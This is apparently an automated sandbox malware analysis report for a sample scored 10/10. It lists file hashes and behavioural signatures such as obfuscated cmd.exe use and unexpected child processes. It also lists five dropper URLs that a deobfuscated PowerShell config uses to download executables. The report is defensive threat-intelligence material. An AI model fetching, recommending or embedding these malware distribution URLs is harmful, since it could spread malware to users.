General

  • Target

    6178dc6d2ae04bda0f998dbca1564824_JaffaCakes118

  • Size

    268KB

  • Sample

    240521-ax1qracd77

  • MD5

    6178dc6d2ae04bda0f998dbca1564824

  • SHA1

    55a31711c9849b8a72dc36e591734227707b7e79

  • SHA256

    d7610008f1f0825a0d6e0eba01ac358d9f553c19db572c42622b2c2e520331a9

  • SHA512

    bb663146795c30788becf3cc086fbe091aa93eb0e7e755a4669260dec501f0aea556b2cffef6edbfd0b14e384a4fc1b82128dcc533301dd6650b093480870f65

  • SSDEEP

    6144:dlHdw7fKygopeaLRcoWXTXx3E/tgDVtZ:dBazKyqaLRcTTX1E/0zZ

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://hockeystickz.com/XE6LOJ

exe.dropper

http://jeffweeksphotography.com/7mHSXX

exe.dropper

http://hellcatshockey.org/k

exe.dropper

http://gsverwelius.nl/7Sf68C7x

exe.dropper

http://aile.pub/KmKEymIK

Targets

    • Target

      6178dc6d2ae04bda0f998dbca1564824_JaffaCakes118

    • Size

      268KB

    • MD5

      6178dc6d2ae04bda0f998dbca1564824

    • SHA1

      55a31711c9849b8a72dc36e591734227707b7e79

    • SHA256

      d7610008f1f0825a0d6e0eba01ac358d9f553c19db572c42622b2c2e520331a9

    • SHA512

      bb663146795c30788becf3cc086fbe091aa93eb0e7e755a4669260dec501f0aea556b2cffef6edbfd0b14e384a4fc1b82128dcc533301dd6650b093480870f65

    • SSDEEP

      6144:dlHdw7fKygopeaLRcoWXTXx3E/tgDVtZ:dBazKyqaLRcTTX1E/0zZ

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • An obfuscated cmd.exe command-line is typically used to evade detection.

MITRE ATT&CK Enterprise v15

Tasks